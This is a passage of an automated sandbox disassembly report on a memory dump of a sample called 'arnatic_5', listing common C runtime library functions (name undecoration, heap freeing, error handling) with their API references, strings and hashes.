Instruction Fuzzy Hash: 03C17271D402099FCB19DFA4E896EEDBBF8AB04341F18549DF505B7291EB309A49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E61F53, Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 497COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00E61FB7
UnDecorator::getSignedDimension.LIBCMT ref: 00E62322

Part of subcall function 00E63066: DName::DName.LIBVCRUNTIME ref: 00E6307B

DName::operator+.LIBCMT ref: 00E62330
UnDecorator::getSignedDimension.LIBCMT ref: 00E62342
UnDecorator::getSignedDimension.LIBCMT ref: 00E62362
DName::operator+.LIBCMT ref: 00E62370

Part of subcall function 00E61349: DName::DName.LIBVCRUNTIME ref: 00E6139F
Part of subcall function 00E61349: DName::operator+.LIBCMT ref: 00E613B9

DName::operator+.LIBCMT ref: 00E62392
DName::operator+.LIBCMT ref: 00E623A8
DName::operator+.LIBCMT ref: 00E62350

Part of subcall function 00E5EFE6: DName::operator+=.LIBCMT ref: 00E5F027

DName::operator+.LIBCMT ref: 00E61FE6

Part of subcall function 00E5EFE6: DName::operator=.LIBVCRUNTIME ref: 00E5F007

DName::DName.LIBVCRUNTIME ref: 00E62107
shared_ptr.LIBCMT ref: 00E62293
DName::operator+.LIBCMT ref: 00E622AB
shared_ptr.LIBCMT ref: 00E622D5
shared_ptr.LIBCMT ref: 00E62596

Strings

4, xrefs: 00E6204A

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+$shared_ptr$Decorator::getDimensionNameName::Signed$Name::operator+=Name::operator=
String ID: 4
API String ID: 462956271-1614143912
Opcode ID: 6b4051b1232c9eaf7326bd93b1d822e489f85f567000738f9ee9c606b562617c
Instruction ID: 3fd7d30b75d3e6b9f2cb9a89873f8f4d2bad9aac0eeff44d70233a6072165562
Opcode Fuzzy Hash: 6b4051b1232c9eaf7326bd93b1d822e489f85f567000738f9ee9c606b562617c
Instruction Fuzzy Hash: A612E270D4454E9FCF18CFA4E895AFEBBF8AB05384F00145EE602BB261DB359A49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E62BC9, Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00E62C34
DName::operator+.LIBCMT ref: 00E62D6A

Part of subcall function 00E5EF8E: shared_ptr.LIBCMT ref: 00E5EFAA

DName::operator+.LIBCMT ref: 00E62DB6
DName::operator+.LIBCMT ref: 00E62DC5
DName::operator+.LIBCMT ref: 00E62D20

Part of subcall function 00E641BB: DName::operator=.LIBVCRUNTIME ref: 00E6424A

DName::operator+.LIBCMT ref: 00E62EF2
DName::operator=.LIBVCRUNTIME ref: 00E62F32
DName::DName.LIBVCRUNTIME ref: 00E62F4A
DName::operator+.LIBCMT ref: 00E62F59
DName::operator+.LIBCMT ref: 00E62F65

Part of subcall function 00E641BB: Replicator::operator[].LIBVCRUNTIME ref: 00E641F8

Strings

`", xrefs: 00E62F4F, 00E62F52
`", xrefs: 00E62C16
`", xrefs: 00E62CFF
@", xrefs: 00E62E77

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID: @"$`"$`"$`"
API String ID: 1026175760-446613956
Opcode ID: 1f8a9c0b3c65989170239fdba8646306f0b67b32f2d6797aef5bccea8d946c2b
Instruction ID: 1feeb378aa2f43dba12ac6562be379f055857cd578259e1e619e3e8d502c1874
Opcode Fuzzy Hash: 1f8a9c0b3c65989170239fdba8646306f0b67b32f2d6797aef5bccea8d946c2b
Instruction Fuzzy Hash: CBC1D371E406089FDB28CFA4E845BEEB7F8AF09344F04545DF64ABB291DB359A48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E63652, Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 281COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 00E636CB
UnDecorator::getSignedDimension.LIBCMT ref: 00E636D7
DName::operator+.LIBCMT ref: 00E63743
DName::operator+.LIBCMT ref: 00E63752

Part of subcall function 00E610DF: __EH_prolog3.LIBCMT ref: 00E610E6

UnDecorator::getSignedDimension.LIBCMT ref: 00E637B4
DName::DName.LIBVCRUNTIME ref: 00E637C8
UnDecorator::getSignedDimension.LIBCMT ref: 00E63830
UnDecorator::getSignedDimension.LIBCMT ref: 00E63850
UnDecorator::getSignedDimension.LIBCMT ref: 00E63870
DName::operator+.LIBCMT ref: 00E63885

Strings

", xrefs: 00E6398F, 00E63995
4, xrefs: 00E63913
., xrefs: 00E6371B
., xrefs: 00E63721

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$H_prolog3NameName::
String ID: .$.$"$4
API String ID: 668128548-1390234988
Opcode ID: 48c9978cc954c1d4bc36eaec1387e71da172c73d7e08bceafdf168fdc2ac8418
Instruction ID: 66ce85eefbf25b8a399e555f41b0ff5cb56b2c5c42c3f8e8b75f5375d89e3ff8
Opcode Fuzzy Hash: 48c9978cc954c1d4bc36eaec1387e71da172c73d7e08bceafdf168fdc2ac8418
Instruction Fuzzy Hash: 5BA1C272D442489ADB28DBB8EC89BEDB7B8AB44344F14649EE105B3186DE745B4CCF11

Uniqueness

Uniqueness Score: -1.00%

Function 00E60374, Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 338COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00E603E0
shared_ptr.LIBCMT ref: 00E60428
shared_ptr.LIBCMT ref: 00E604BC
operator+.LIBVCRUNTIME ref: 00E60515
DName::operator=.LIBVCRUNTIME ref: 00E6052D
shared_ptr.LIBCMT ref: 00E60777
DName::operator+.LIBCMT ref: 00E607EB
operator+.LIBVCRUNTIME ref: 00E60834

Strings

(, xrefs: 00E6068D, 00E606B1
$%, xrefs: 00E607D5, 00E607E5, 00E60805, 00E607F0
x$, xrefs: 00E6077C, 00E60786

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID: $%$x$$(
API String ID: 1464150960-959154905
Opcode ID: c86deafdec68a999a2312ce37711dfd2415c79b6f8378290836f955f4f230ec5
Instruction ID: 4a3442684c67110fb871e9e3c81bd35c3626e0de3f70030daa5a6ed646f8fedb
Opcode Fuzzy Hash: c86deafdec68a999a2312ce37711dfd2415c79b6f8378290836f955f4f230ec5
Instruction Fuzzy Hash: C0D1D6B1C4022A9FCB28DF90E585AFFBBB4AB40388F10A15ED521B7241DB749749CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E641BB, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00E641F8
DName::operator=.LIBVCRUNTIME ref: 00E6424A

Strings

`#, xrefs: 00E6439E
.3, xrefs: 00E643B9
template-parameter-, xrefs: 00E6425C
4, xrefs: 00E642F0
@, xrefs: 00E64360
generic-type-, xrefs: 00E64283
x", xrefs: 00E6426E

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: .3$@$`#$generic-type-$template-parameter-$x"$4
API String ID: 3211817929-4036315243
Opcode ID: 1bb9e45ff88638c66bf6723458a2079cf2de8e212f34ef7e9c1ad738ff0128cf
Instruction ID: 759cd8b96f702a27dc86e57cf9cd3d97b660b30e2a4d956bc44eb26e22ee086c
Opcode Fuzzy Hash: 1bb9e45ff88638c66bf6723458a2079cf2de8e212f34ef7e9c1ad738ff0128cf
Instruction Fuzzy Hash: 566104B1D402499FCB18DF95E882AEEBBF8AF14340F14505DE615B72E1DB349A09CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E78DA3, Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E78DC0

Part of subcall function 00E7494E: RtlFreeHeap.NTDLL(00000000,00000000,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?), ref: 00E74964
Part of subcall function 00E7494E: GetLastError.KERNEL32(?,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?,?), ref: 00E74976

_free.LIBCMT ref: 00E78DD2
_free.LIBCMT ref: 00E78DE4
_free.LIBCMT ref: 00E78DF6
_free.LIBCMT ref: 00E78E08
_free.LIBCMT ref: 00E78E1A
_free.LIBCMT ref: 00E78E2C
_free.LIBCMT ref: 00E78E3E
_free.LIBCMT ref: 00E78E50
_free.LIBCMT ref: 00E78E62
_free.LIBCMT ref: 00E78E74
_free.LIBCMT ref: 00E78E86
_free.LIBCMT ref: 00E78E98

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 80d0ad79b05fedd4c80b1c06385fda933404b7e6e8c1737ec708c1400838a782
Instruction ID: 819052d173609b7744a6721f81a8a6d69395703a2bd9dd056837a95ac5b0f692
Opcode Fuzzy Hash: 80d0ad79b05fedd4c80b1c06385fda933404b7e6e8c1737ec708c1400838a782
Instruction Fuzzy Hash: 0C213E72545626EF8A20EB69FE85C0B33F9EB54364364AC06F14DF7591CB30FC858624

Uniqueness

Uniqueness Score: -1.00%

Function 00E79B2D, Relevance: 18.1, APIs: 12, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E79B66

Part of subcall function 00E7494E: RtlFreeHeap.NTDLL(00000000,00000000,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?), ref: 00E74964
Part of subcall function 00E7494E: GetLastError.KERNEL32(?,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?,?), ref: 00E74976

Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78DC0
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78DD2
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78DE4
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78DF6
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E08
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E1A
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E2C
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E3E
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E50
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E62
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E74
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E86
Part of subcall function 00E78DA3: _free.LIBCMT ref: 00E78E98

_free.LIBCMT ref: 00E79B88
_free.LIBCMT ref: 00E79B9D
_free.LIBCMT ref: 00E79BA8
_free.LIBCMT ref: 00E79BCA
_free.LIBCMT ref: 00E79BDD
_free.LIBCMT ref: 00E79BEB
_free.LIBCMT ref: 00E79BF6
_free.LIBCMT ref: 00E79C2E
_free.LIBCMT ref: 00E79C35
_free.LIBCMT ref: 00E79C52
_free.LIBCMT ref: 00E79C6A

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 54a11056978943b4228622941653100ed6fa2f21fd2bf2c07f1251dadd41f584
Instruction ID: a528d5b4b7fdba00384fadc01fe493302849a83fd1f0656e440b92bd803790ac
Opcode Fuzzy Hash: 54a11056978943b4228622941653100ed6fa2f21fd2bf2c07f1251dadd41f584
Instruction Fuzzy Hash: 0E313B7160024ADEEF21AA38ED46B9BB3E9EF40364F20A41AE55DE7192DF31AC418714

Uniqueness

Uniqueness Score: -1.00%

Function 00E6011C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00E601AA
DName::operator+.LIBCMT ref: 00E601FD

Part of subcall function 00E5EF8E: shared_ptr.LIBCMT ref: 00E5EFAA

Part of subcall function 00E5EEB9: DName::operator+.LIBCMT ref: 00E5EEDA

DName::operator+.LIBCMT ref: 00E601EE
DName::operator+.LIBCMT ref: 00E6024E
DName::operator+.LIBCMT ref: 00E6025B
DName::operator+.LIBCMT ref: 00E602A2
DName::operator+.LIBCMT ref: 00E602AF

Strings

0), xrefs: 00E6015F
8&, xrefs: 00E60298, 00E6029B

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID: 0)$8&
API String ID: 1037112749-2807617765
Opcode ID: 6e86d6aed40afd2bdf3019201de8dfb9cda5179fc71e02810563884c674b6e2b
Instruction ID: fe72095333a53356709b156723a3bf422fda75c027ab8e3775c29045e5b061e3
Opcode Fuzzy Hash: 6e86d6aed40afd2bdf3019201de8dfb9cda5179fc71e02810563884c674b6e2b
Instruction Fuzzy Hash: CF515E71D44218ABCB19DB94D856EEFBBF8AF08340F04545AF905B7281EB709A48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E64065, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00E640A9
DName::operator+.LIBCMT ref: 00E640B5

Part of subcall function 00E5EF8E: shared_ptr.LIBCMT ref: 00E5EFAA

DName::operator+=.LIBCMT ref: 00E64175

Part of subcall function 00E62BC9: DName::operator+.LIBCMT ref: 00E62C34
Part of subcall function 00E62BC9: DName::operator+.LIBCMT ref: 00E62EF2

Part of subcall function 00E5EEB9: DName::operator+.LIBCMT ref: 00E5EEDA

DName::operator+.LIBCMT ref: 00E64130

Part of subcall function 00E5EFE6: DName::operator=.LIBVCRUNTIME ref: 00E5F007

DName::DName.LIBVCRUNTIME ref: 00E64199
DName::operator+.LIBCMT ref: 00E641A5

Strings

D&, xrefs: 00E640A6, 00E64072, 00E64096
D&, xrefs: 00E640EA, 00E640EF

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID: D&$D&
API String ID: 2795783184-613068759
Opcode ID: e95ded0b00561bcb38c088b0e1a168365be9061af97fe716ed01e2623abd801f
Instruction ID: 4c22053e73b4cd06076d417711ce69c6ba8e46bcd96d368b2438163d070f8c96
Opcode Fuzzy Hash: e95ded0b00561bcb38c088b0e1a168365be9061af97fe716ed01e2623abd801f
Instruction Fuzzy Hash: 2941D7B0A40248AFDB18DF64D891BAE7BE9AB16344F44149CF685BB3D1DB345D88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E62F7B, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E641BB: Replicator::operator[].LIBVCRUNTIME ref: 00E641F8

DName::operator=.LIBVCRUNTIME ref: 00E63021

Part of subcall function 00E62BC9: DName::operator+.LIBCMT ref: 00E62C34
Part of subcall function 00E62BC9: DName::operator+.LIBCMT ref: 00E62EF2

DName::operator+.LIBCMT ref: 00E62FDC
DName::operator+.LIBCMT ref: 00E62FE8
DName::DName.LIBVCRUNTIME ref: 00E63035
DName::operator+.LIBCMT ref: 00E63044
DName::operator+.LIBCMT ref: 00E63050

Strings

`", xrefs: 00E62F86, 00E62F81
`", xrefs: 00E62FD2, 00E62FD5

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID: `"$`"
API String ID: 955152517-2684874091
Opcode ID: 2c9c8a61a3870c5c51177dd2989e258dd68758428715e586f35edbc4efe34132
Instruction ID: 9bbbd1379368d3be43a5a0d1d65667b3cca2051b2f17e30b498d4e1c7eda7aa8
Opcode Fuzzy Hash: 2c9c8a61a3870c5c51177dd2989e258dd68758428715e586f35edbc4efe34132
Instruction Fuzzy Hash: 1031A4B1A002049FCB18DFA4E9919EEBBF9AF59340F00545DE647B7391DB359648CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00E74F52, Relevance: 13.6, APIs: 9, Instructions: 121COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00E71B83,00000000,0000D8C4,00000000,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74F56
_free.LIBCMT ref: 00E74FAD
_free.LIBCMT ref: 00E74FE1
SetLastError.KERNEL32(00000000,0000D8C4,00000000,0000D8C4), ref: 00E74FEE
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74FFA
_abort.LIBCMT ref: 00E75000
_free.LIBCMT ref: 00E75056
_free.LIBCMT ref: 00E7508A

Part of subcall function 00E76F30: TlsSetValue.KERNEL32(?,?,00000018), ref: 00E76F72

_abort.LIBCMT ref: 00E7509A

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$ErrorLast$_abort$Value
String ID:
API String ID: 1408155231-0
Opcode ID: 16c308eaf367bc699abba56980982d2c418f7f1aaea19ed00f6b0728e10bb333
Instruction ID: 229bbdd36eafddd32c44ec828658655a792f0ff905e5795441a08503cce0b37a
Opcode Fuzzy Hash: 16c308eaf367bc699abba56980982d2c418f7f1aaea19ed00f6b0728e10bb333
Instruction Fuzzy Hash: 0A31ED727599167AC6293735BC03F6B2288EB42778B21F315FA3CB21E5DF608C019294

Uniqueness

Uniqueness Score: -1.00%

Function 00E70947, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E74F52: GetLastError.KERNEL32(00000000,00000000,00E71B83,00000000,0000D8C4,00000000,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74F56
Part of subcall function 00E74F52: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E72072,0000D8C4,0000D8C4,00000000,0000D8C4), ref: 00E74FFA
Part of subcall function 00E74F52: _abort.LIBCMT ref: 00E75000
Part of subcall function 00E74F52: _abort.LIBCMT ref: 00E7509A

_free.LIBCMT ref: 00E70C62
_free.LIBCMT ref: 00E70C7B
_free.LIBCMT ref: 00E70CAD
_free.LIBCMT ref: 00E70CB6
_free.LIBCMT ref: 00E70CC2

Strings

C, xrefs: 00E70AAF
4, xrefs: 00E70C3F

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: C$4
API String ID: 2991157371-2171828502
Opcode ID: cee57373b481aeca24bebc9be1d6f89adb4c37717edc488b910c4bb21bb8146a
Instruction ID: 0210f7f9753304bf58ae3a36e1bfa7642468cf8fd1c0ec81fb378d95db2fc278
Opcode Fuzzy Hash: cee57373b481aeca24bebc9be1d6f89adb4c37717edc488b910c4bb21bb8146a
Instruction Fuzzy Hash: FBB12875A0121ADFDB25DF18C884AADB7B4FB48314F2096AAE94DB7351D770AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00E610DF, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E610E6
UnDecorator::getSymbolName.LIBCMT ref: 00E61174
DName::operator+.LIBCMT ref: 00E61278

Part of subcall function 00E5EF8E: shared_ptr.LIBCMT ref: 00E5EFAA

DName::DName.LIBVCRUNTIME ref: 00E61335

Strings

PE, xrefs: 00E61250, 00E61128
(PE, xrefs: 00E6110E, 00E61112
`", xrefs: 00E6125A

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
String ID: (PE$PE$`"
API String ID: 334624791-1055205154
Opcode ID: 2875d681afb96c26af85df0003403d4b76f695f5fe6b2ec48e3c67dbf343de21
Instruction ID: 03342a0d8cf7ca7072399d91305028d8d9b536bf07aadb68ca1e569d13783cda
Opcode Fuzzy Hash: 2875d681afb96c26af85df0003403d4b76f695f5fe6b2ec48e3c67dbf343de21
Instruction Fuzzy Hash: DB819D71D412498FDB06CF95E880AEDBBF8AF09354F0860AEEA05BB361D7349905CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00E5C110, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E5C147
___except_validate_context_record.LIBVCRUNTIME ref: 00E5C14F
_ValidateLocalCookies.LIBCMT ref: 00E5C1D8
__IsNonwritableInCurrentImage.LIBCMT ref: 00E5C203
_ValidateLocalCookies.LIBCMT ref: 00E5C258

Strings

4, xrefs: 00E5C21C
csm, xrefs: 00E5C1ED

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

